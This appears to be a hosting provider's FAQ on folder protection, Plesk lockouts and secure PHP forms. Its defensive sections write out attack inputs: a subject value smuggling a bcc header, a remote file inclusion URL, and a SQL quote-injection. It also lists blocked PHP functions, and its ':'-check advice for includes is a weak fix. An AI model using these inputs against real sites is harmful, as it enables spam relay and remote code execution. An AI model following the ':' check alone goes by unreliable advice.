Frequently Asked Questions

Log into your Control Panel, go to the website where you want to protect a folder.

Click on "Directories". Click on "Add new directory". Enter the name of the folder, and choose a text to be displayed at login. Click OK.

Then click "Add new user" to create a user. Of course it is possible to create multiple users!

The files you wish to protect can then be put in the folder you specified!

Abuse of standard contact forms has become more common lately. An example:

A contact form consists of the fields:
  • Name (1 line)
  • Email address (1 line)
  • Subject (1 line)
  • Message (multiline).

    The "Subject" field is used as the subject of the email. A PHP command to send mail from this form may look like this:

    mail ("info@mywebsite.com", $subject, $message);

    The headers of this email will then look like this:
    To: info@mywebsite.com
    Subject: $subject


    With spam form injection, the subject is submitted as follows:
    subject=This is the subject \nbcc: test@test.com

    The headers will then look like this:
    To: info@mywebsite.com
    Subject: This is the subject
    bcc: test@test.com

    This email is then sent not only to info@mywebsite.com but also to test@test.com, and possibly to several other addresses entered the same way.

    We would therefore ask everyone to make sure their contact form is protected. A good way to counter this is to check for the characters \n and \r in any field that should not consist of more than one line.

    Example:
    // Remove every carriage return and line feed from the one-line field
    $subject = str_replace (array ("\r", "\n"), '', $_POST['subject']);
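
A stricter version of this check, as an added example that is not code from the original FAQ: it rejects a submission whose one-line fields contain \r or \n instead of repairing them, and keeps the visitor's name and address out of the mail headers. The field names, the length limit and the helper names single_line_field() and build_contact_mail() are assumptions.

```php
<?php
// Added example, not the host's code. Field names, the length limit and the
// helper names single_line_field() / build_contact_mail() are assumptions.

// Return a single-line field, or null if it is missing, empty, too long,
// or contains CR/LF (an attempt to start a new header line).
function single_line_field(array $post, $key, $maxLength = 200)
{
    if (!isset($post[$key]) || !is_string($post[$key])) {
        return null;                      // missing, or sent as an array
    }
    if (preg_match('/[\r\n]/', $post[$key])) {
        return null;                      // reject instead of repairing
    }
    $value = trim($post[$key]);
    if ($value === '' || strlen($value) > $maxLength) {
        return null;
    }
    return $value;
}

// Build the arguments for mail(), or return null to refuse the submission.
function build_contact_mail(array $post)
{
    $name    = single_line_field($post, 'name');
    $email   = single_line_field($post, 'email');
    $subject = single_line_field($post, 'subject');
    $message = (isset($post['message']) && is_string($post['message']))
        ? $post['message'] : null;        // the only multi-line field
    if ($name === null || $email === null || $subject === null || $message === null) {
        return null;
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // Fixed recipient; the sender's details go in the body, not in headers.
    return array('info@mywebsite.com', $subject, "From: $name <$email>\n\n$message");
}

// Constructed submissions: a normal one and the injection from the text.
$ok  = array('name' => 'Jan', 'email' => 'jan@example.com',
             'subject' => 'This is the subject', 'message' => "Line 1\nLine 2");
$bad = array('subject' => "This is the subject\nbcc: test@test.com") + $ok;

foreach (array('normal' => $ok, 'injected' => $bad) as $label => $post) {
    $args = build_contact_mail($post);
    echo $label, ': ', $args === null ? 'rejected' : "accepted, subject \"$args[1]\"", "\n";
    // if ($args !== null) { mail($args[0], $args[1], $args[2]); }
}
```
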
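  • When inserting text that a visitor could have changed into a query, make sure the variable is escaped and enclosed in single quotes (').
    Example:
    // The value is escaped and placed between single quotes.
    // Note: the mysql_* functions were removed in PHP 7.0; with mysqli or PDO, use prepared statements.
    $result = mysql_query ("INSERT INTO table (id, text) VALUES ('', '" . mysql_real_escape_string ($text) . "')");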

    If you don't do this, the visitor can alter the query by putting a ' in the text and then starting a new query.

    If you make more than 5 wrong attempts to log into Plesk within 3 minutes, you will be locked out for 30 minutes. After 30 minutes you can try again.

    No time to wait? Please contact us.

    Because many standard scripts (e.g. Joomla) have exploits that allow external code to be executed and cause damage, we have decided to disallow opening files from other websites from PHP. This applies to the following commands:
  • fopen
  • include
  • require
  • include_once
  • require_once
  • file

    Of course there are plenty of reasons your website might need to load files from external webservers. If your web site also requires this,

    Many people build their pages from a template and load a file into it.
    E.g.: index.php?page=voorpagina.php

    The file "voorpagina.php" is then loaded through an include.

    Do not do this! By filling in index.php?page=http://www.test.com/phpcode.php, a user can execute remote code through your script. This is very dangerous!

    It is better to work with a header and footer. If that is not appropriate, check that the file is on the current server, for example by checking whether there is a ":" in the $page variable.
  • If you allow visitors to upload files, you must make sure that no malicious PHP or other code can be uploaded.

    Therefore, check the extension of every uploaded file, so that, for example, .php files cannot be uploaded!